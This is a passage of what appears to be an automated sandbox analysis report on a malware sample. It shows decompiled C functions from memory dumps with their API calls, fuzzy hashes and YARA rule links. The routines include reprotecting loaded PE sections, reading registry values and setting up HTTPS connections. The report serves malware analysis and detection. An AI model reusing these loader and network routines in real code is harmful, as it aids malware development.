Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Sep 18 2021
API String ID: 4010158826-1373364653
Opcode ID: 757e81e64a23b2110e50eb16d664d3e58471ff17a870a4826b322136ecbde8b2
Instruction ID: 57468959a8a1e8e4c1aa0e768da44b6654d9728f175ad697358f6c1d0afa5f1e
Opcode Fuzzy Hash: 757e81e64a23b2110e50eb16d664d3e58471ff17a870a4826b322136ecbde8b2
Instruction Fuzzy Hash: 75312C75D10219AFDB01CFD8D980AEEB7B8FF05304F104159E915BB241E771AA5ACB94

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1719, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6ECE1719(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6ECE15C6(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6ece1722
0x6ece1727
0x6ece1735
0x6ece173a
0x6ece173a
0x6ece1740
0x6ece1745
0x6ece1749
0x6ece174d
0x6ece174d
0x6ece1757
0x6ece1760

APIs

GetCurrentThread.KERNEL32 ref: 6ECE171C
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6ECE1727
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6ECE173A
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6ECE174D

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: c4e3b51d91002d099420cc28ad4652ba08e10f1d5f2e88c1b12a3c97ec2bcd81
Instruction ID: 3e96431274a2ce77caf65b1462198e11c177fed3f03765194656b3e01f9eff40
Opcode Fuzzy Hash: c4e3b51d91002d099420cc28ad4652ba08e10f1d5f2e88c1b12a3c97ec2bcd81
Instruction Fuzzy Hash: 0FE0D831306A112BE6112B6D4DC8DBB7BBCEF927317010336F631D62E0EB549C1689B5

Uniqueness

Uniqueness Score: -1.00%

Function 00759311, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00759311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x75d364; // 0x2d295b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x75d364; // 0x2d295b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x75d030) {
					HeapFree( *0x75d270, 0, _t8);
				}
				_t9 = E00755141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x75d364; // 0x2d295b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x00759311
0x00759311
0x0075931a
0x0075932a
0x0075932a
0x0075932f
0x00759334
0x00000000
0x00000000
0x00759324
0x00759324
0x00759336
0x0075933a
0x0075934c
0x0075934c
0x00759357
0x0075935c
0x0075935f
0x00759364
0x00759368
0x0075936e

APIs

RtlEnterCriticalSection.NTDLL(02D29570), ref: 0075931A
Sleep.KERNEL32(0000000A,?,00755390), ref: 00759324
HeapFree.KERNEL32(00000000,00000000,?,00755390), ref: 0075934C
RtlLeaveCriticalSection.NTDLL(02D29570), ref: 00759368

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 18bf489424eaab2657cbd7b8cf1a6f6a1bfa4ce04a2bf3872ee6abd05e5ef5eb
Instruction ID: 5da771cb2b02e0b31b6c1f76a580e6063848cea11086163b1ad472cd4b9cefb6
Opcode Fuzzy Hash: 18bf489424eaab2657cbd7b8cf1a6f6a1bfa4ce04a2bf3872ee6abd05e5ef5eb
Instruction Fuzzy Hash: CAF0DA71604340EFEB359FA4DE48BD63BA4FB14343B058414FA46C61E1D6A8DC44CA19

Uniqueness

Uniqueness Score: -1.00%

Function 0075121A, Relevance: 4.6, APIs: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0075121A(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t65;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t63 = __esi + 0x2c;
				_v16 = 0;
				 *_t63 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t63);
				_t64 = __imp__; // 0x6fe5fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t64() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E007575F6(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t64() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t65 = E007575F6(_v8 + 1);
							if(_t65 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t65, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t65;
							}
						}
						E00754AAB(_v20);
					}
					goto L12;
				}
			}

0x00751220
0x00751227
0x0075122a
0x0075122d
0x0075122f
0x00751234
0x00751317
0x0075131d
0x0075131d
0x0075123e
0x00751245
0x0075124d
0x0075130e
0x00751314
0x00000000
0x00751314
0x00751256
0x0075125a
0x0075125b
0x0075125c
0x00751262
0x00751263
0x00751268
0x0075126f
0x00000000
0x00751275
0x00751284
0x00751287
0x0075128a
0x00751293
0x00751298
0x0075129d
0x00751305
0x0075129f
0x007512a2
0x007512a6
0x007512a7
0x007512a8
0x007512a9
0x007512ab
0x007512b2
0x007512f8
0x007512b4
0x007512b4
0x007512bf
0x007512cd
0x007512d1
0x007512e9
0x007512d3
0x007512dc
0x007512e4
0x007512e4
0x007512d1
0x007512fe
0x007512fe
0x00000000
0x0075129d

APIs

GetLastError.KERNEL32 ref: 0075130E

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

wcstombs.NTDLL ref: 007512DC
GetLastError.KERNEL32 ref: 007512F2

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID:
API String ID: 2631933831-0
Opcode ID: 20fb10e98cc6808f73e2d5baa89dcd0752688a1b491354ab1fc27d86adf3089a
Instruction ID: 59be7c5d753c8ee0f9f63716444d7b24c94641de705767a9cc61185b5674f0cf
Opcode Fuzzy Hash: 20fb10e98cc6808f73e2d5baa89dcd0752688a1b491354ab1fc27d86adf3089a
Instruction Fuzzy Hash: BE312BB1900208EFDB11DFA5CC84AEEB7B8FF08306F508569E942E3251D7B49E49DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0075502E, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075502E(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E007537AC(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x75d2e0; // 0x25ca5a8
				_t4 = _t24 + 0x75edc8; // 0x2d29370
				_t5 = _t24 + 0x75ed70; // 0x4f0053
				_t26 = E00754B28( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x75d2e0; // 0x25ca5a8
						_t11 = _t32 + 0x75edbc; // 0x2d29364
						_t48 = _t11;
						_t12 = _t32 + 0x75ed70; // 0x4f0053
						_t52 = E0075131E(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x75d2e0; // 0x25ca5a8
							_t13 = _t35 + 0x75ee06; // 0x30314549
							if(E0075117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x75d294 - 6;
								if( *0x75d294 <= 6) {
									_t42 =  *0x75d2e0; // 0x25ca5a8
									_t15 = _t42 + 0x75ec12; // 0x52384549
									E0075117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x75d2e0; // 0x25ca5a8
							_t17 = _t38 + 0x75ee00; // 0x2d293a8
							_t18 = _t38 + 0x75edd8; // 0x680043
							_t45 = E00755DDA(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x75d270, 0, _t52);
						}
					}
					HeapFree( *0x75d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E007551BB(_t54);
				}
				return _t45;
			}

0x0075502e
0x0075503e
0x00755041
0x00755048
0x0075504a
0x0075504a
0x0075504d
0x00755052
0x00755059
0x00755066
0x0075506b
0x0075506f
0x0075507d
0x0075508b
0x0075508f
0x00755120
0x00755120
0x00755095
0x00755095
0x0075509a
0x0075509a
0x007550a1
0x007550ad
0x007550af
0x007550b1
0x007550b3
0x007550ba
0x007550cc
0x007550ce
0x007550d5
0x007550d7
0x007550de
0x007550e9
0x007550e9
0x007550d5
0x007550ee
0x007550f3
0x007550fa
0x00755118
0x0075511a
0x0075511a
0x007550b1
0x0075512c
0x0075512c
0x0075512e
0x00755133
0x00755135
0x00755135
0x00755140

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02D29370,00000000,?,7519F710,00000000,7519F730), ref: 0075507D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02D293A8,?,00000000,30314549,00000014,004F0053,02D29364), ref: 0075511A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007554EF), ref: 0075512C

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bba3ad73261cf144021057cfbd25814ceee61e6c8296b7825e211f976345b5a3
Instruction ID: fcb0c77498291da0f92e48038e3ca8ba1f20a748e434af0574259e3b9747694a
Opcode Fuzzy Hash: bba3ad73261cf144021057cfbd25814ceee61e6c8296b7825e211f976345b5a3
Instruction Fuzzy Hash: 25319271A0060CFFDB31DB90DD89EEE7BB8FB08702F1441A9B90097161D6F99E499B94

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE12B5, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6ECE12B5(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6ece41c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x6ece12bf
0x6ece12cc
0x6ece12d2
0x6ece12de
0x6ece12ee
0x6ece12f0
0x6ece12f8
0x6ece138d
0x6ece1394
0x00000000
0x00000000
0x00000000
0x6ece12fe
0x6ece12fe
0x6ece12fe
0x6ece1302
0x00000000
0x00000000
0x6ece130e
0x6ece1312
0x6ece1336
0x6ece133a
0x6ece134e
0x6ece134e
0x6ece1354
0x6ece1363
0x6ece1367
0x6ece136f
0x6ece136f
0x6ece1377
0x6ece137a
0x6ece1387
0x00000000
0x00000000
0x00000000
0x00000000
0x6ece1387
0x6ece1342
0x6ece1346
0x6ece134c
0x00000000
0x00000000
0x00000000
0x6ece134c
0x6ece131a
0x6ece131e
0x6ece1328
0x6ece1320
0x6ece1320
0x6ece1320
0x00000000
0x6ece131e
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6ECE12EE
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6ECE1363
GetLastError.KERNEL32 ref: 6ECE1369

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: b464f77721a3a1eaafaf368015d1239d93396aef63733da0664efef2a31bfba0
Instruction ID: a057f5c0233d3faac411bf3d79ea7f320e873c776e048e577ef212eb790bdfc8
Opcode Fuzzy Hash: b464f77721a3a1eaafaf368015d1239d93396aef63733da0664efef2a31bfba0
Instruction Fuzzy Hash: D3214B7190020AEFCB18CFC9C985AAAF7F4FB08355F014459D502D7919F3B4A668CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00755141, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00755141(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E007575F6(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x75c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x00755145
0x00755152
0x00755154
0x00755155
0x0075515d
0x0075515d
0x00755161
0x00000000
0x00000000
0x00755158
0x00755159
0x0075515c
0x0075515c
0x00755169
0x0075516e
0x00755173
0x0075517b
0x00755181
0x00755183
0x00755186
0x0075518a
0x0075518c
0x0075518f
0x0075518f
0x00755190
0x00755192
0x0075518f
0x0075519c
0x0075519f
0x007551a2
0x007551a3
0x007551a5
0x007551ac
0x007551ac
0x007551b8

APIs

StrChrA.SHLWAPI(?,00000020,00000000,02D295AC,00755390,?,0075935C,?,02D295AC,?,00755390), ref: 0075515D
StrTrimA.KERNELBASE(?,0075C2A4,00000002,?,0075935C,?,02D295AC,?,00755390), ref: 0075517B
StrChrA.SHLWAPI(?,00000020,?,0075935C,?,02D295AC,?,00755390), ref: 00755186

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 455b4d8c146d78fb150ffbc30c6739971866ca94b9ebcccce884a75f25be149a
Instruction ID: 61c6ae04295da536a2acfd80c18954095ccbc26fdd47525433d19349e9007ddb
Opcode Fuzzy Hash: 455b4d8c146d78fb150ffbc30c6739971866ca94b9ebcccce884a75f25be149a
Instruction Fuzzy Hash: B601B171300B4A6FE7204A6A8C64FE77F9DEB85352F144011BD45CB282D9F8DC06C660

Uniqueness

Uniqueness Score: -1.00%

Function 00757749, Relevance: 3.1, APIs: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00757749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _t34;
				long _t36;
				unsigned int _t37;
				signed int _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00751922(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00754AAB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00751922(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x6fe5f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00754AAB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00751922(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x75d2e0; // 0x25ca5a8
										_t19 = _t42 + 0x75e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4);
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00754AAB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}

0x00757749
0x00757758
0x0075775e
0x0075788f
0x0075788f
0x00757764
0x00757764
0x0075776a
0x0075776c
0x0075777c
0x0075777c
0x0075776e
0x0075776e
0x00757777
0x00757777
0x00757770
0x00757770
0x00757775
0x00000000
0x00000000
0x00000000
0x00000000
0x00757775
0x0075776e
0x0075778a
0x00757791
0x00757794
0x0075779c
0x00000000
0x007577a2
0x007577a4
0x007577a9
0x007577ae
0x00000000
0x007577b4
0x007577b4
0x007577bd
0x007577d4
0x007577e0
0x007577e9
0x007577ec
0x007577f4
0x00000000
0x007577fa
0x007577fd
0x00757809
0x0075780f
0x00000000
0x00757811
0x00757814
0x0075781d
0x0075781d
0x00757827
0x0075782e
0x00757831
0x00757836
0x0075783b
0x00000000
0x0075783d
0x0075783f
0x0075784b
0x0075784e
0x00757856
0x00757858
0x00757869
0x00757869
0x0075786b
0x0075786f
0x00757870
0x00757872
0x00757879
0x00000000
0x0075787b
0x0075787b
0x0075787f
0x00757880
0x00757882
0x00757889
0x00000000
0x0075788b
0x0075788b
0x0075788b
0x00757889
0x00757879
0x0075783b
0x0075780f
0x007577bf
0x007577ca
0x007577ce
0x00000000
0x00000000
0x00000000
0x00000000
0x007577ce
0x007577bd
0x007577ae
0x0075779c
0x00757898

APIs

Part of subcall function 00751922: lstrlen.KERNEL32(?,00000000,02D29B38,00000000,007574FF,02D29D16,?,?,?,?,?,69B25F44,00000005,0075D00C), ref: 00751929
Part of subcall function 00751922: mbstowcs.NTDLL ref: 00751952
Part of subcall function 00751922: memset.NTDLL ref: 00751964

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,0075544C,00000000,00000000,02D29618,?,?,00752A8A,?,02D29618,0000EA60), ref: 00757764
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,0075544C,00000000,00000000,02D29618,?,?,00752A8A,?,02D29618,0000EA60), ref: 0075788F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: d5601f5983379bd1b39617172aad9ac8fb51eac7442687b3ceb51f38b30c1003
Instruction ID: f2b40fbf17b16e1925bc8f1eb3707ca24d7f4371c0eb2e5f04b814d86afad3f4
Opcode Fuzzy Hash: d5601f5983379bd1b39617172aad9ac8fb51eac7442687b3ceb51f38b30c1003
Instruction Fuzzy Hash: 9F4153B1100304FFEB259FA0DC89EEA7BADEB04742F108929BA4595051D7B9A948CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0075144D, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0075144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00753DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x75d2e0; // 0x25ca5a8
						_t20 = _t68 + 0x75e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E007547EB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00751453
0x00751456
0x00751466
0x0075146f
0x00751473
0x00751541
0x00751547
0x00751547
0x0075148d
0x00751492
0x00751496
0x0075149c
0x007514a1
0x007514a8
0x007514b7
0x007514b7
0x007514bb
0x007514bd
0x007514c9
0x007514d4
0x007514df
0x007514e3
0x007514ed
0x007514f1
0x007514f3
0x007514f8
0x007514ff
0x0075150f
0x0075150f
0x007514f8
0x007514f1
0x00751511
0x00751516
0x0075151b
0x0075151b
0x0075151e
0x00751527
0x0075152c
0x0075152c
0x00751531
0x00751536
0x00751536
0x00751531
0x007514bb
0x00751538
0x0075153e
0x00000000

APIs

Part of subcall function 00753DA0: SysAllocString.OLEAUT32(80000002), ref: 00753DFD
Part of subcall function 00753DA0: SysFreeString.OLEAUT32(00000000), ref: 00753E63

SysFreeString.OLEAUT32(?), ref: 0075152C
SysFreeString.OLEAUT32(007528D9), ref: 00751536

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 8d259c18a2bb1d4d41bcc4d5d4e58fca337278aed0658e1c02adda5579feb253
